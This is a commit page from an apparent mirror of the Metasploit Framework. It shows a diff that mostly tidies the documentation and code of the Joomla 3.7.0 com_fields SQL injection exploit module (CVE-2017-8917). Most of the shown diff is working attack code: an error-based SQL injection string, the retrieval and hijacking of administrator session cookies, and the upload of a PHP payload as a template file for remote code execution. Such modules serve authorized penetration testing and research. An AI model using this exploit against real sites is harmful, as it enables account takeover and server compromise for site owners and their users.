infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Changes suggested by h00die

GSoC/Meterpreter_Web_Console
Luis Hernandez 2018-03-08 20:13:01 -05:00
parent 05a653b853
commit 048d0d1fe4
2 changed files with 14 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
View File

@ -1,7 +1,7 @@
## Vulnerable Application ## Vulnerable Application
This module exploits a sql injection in the core of Joomla 3.7.0. This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
This vulnerability can allow remote code execution. With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
## Verification ## Verification
@ -15,7 +15,7 @@
## Scenarios ## Scenarios
### Joomal 3.7.0 and an administrator must be authenticated in the backend ### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator
``` ```
msf > use exploit/unix/webapp/joomla_comfields_sqli_rce msf > use exploit/unix/webapp/joomla_comfields_sqli_rce

23
modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
View File

@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Joomla Component Fields SQLi Remote Code Execution", 'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a SQL injection vulnerability found in Joomla versions This module exploits a SQL injection vulnerability found in Joomla versions
3.7.0. 3.7.0.
@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
'References' => 'References' =>
[ [
[ 'CVE', '2017-8917' ], # SQLi [ 'CVE', '2017-8917' ], # SQLi
['EDB', '42033'],
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ] [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
], ],
'Payload' => 'Payload' =>
@ -38,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => 'Targets' =>
[ [
[ 'Joomla 3.7.0 ', {} ] [ 'Joomla 3.7.0', {} ]
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "May 17 2017", 'DisclosureDate' => 'May 17 2017',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
def sqli( tableprefix , option) def sqli( tableprefix , option)
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in). # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history. # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions. # This way we make sure that's excluded and we only get real admin sessions.
if option == 'check' if option == 'check'
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))" sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
else else
@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
} }
}) })
return res return res
end end
@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Retrieve the admin session using our retrieved table prefix # Retrieve the admin session using our retrieved table prefix
res = sqli("#{table_prefix}_", 'exploit') res = sqli("#{table_prefix}_", 'exploit')
if res && res.code == 500 && res.body =~ /qqq(.*)qqq/ if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
auth_cookie_part = $1 auth_cookie_part = $1
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote
# Modify cookie to authenticated admin # Modify cookie to authenticated admin
auth_cookie = cookie_begin auth_cookie = cookie_begin
auth_cookie << "=" auth_cookie << '='
auth_cookie << auth_cookie_part auth_cookie << auth_cookie_part
auth_cookie << ";" auth_cookie << ';'
# Authenticated session # Authenticated session
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie 'cookie' => auth_cookie
}) })
@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Retrieve template view # Retrieve template view
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie, 'cookie' => auth_cookie,
'vars_get' => { 'vars_get' => {
'option' => 'com_templates', 'option' => 'com_templates',
@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("#{peer} - Creating file [ #{filename}.php ]") print_status("#{peer} - Creating file [ #{filename}.php ]")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie, 'cookie' => auth_cookie,
'vars_get' => { 'vars_get' => {
'option' => 'com_templates', 'option' => 'com_templates',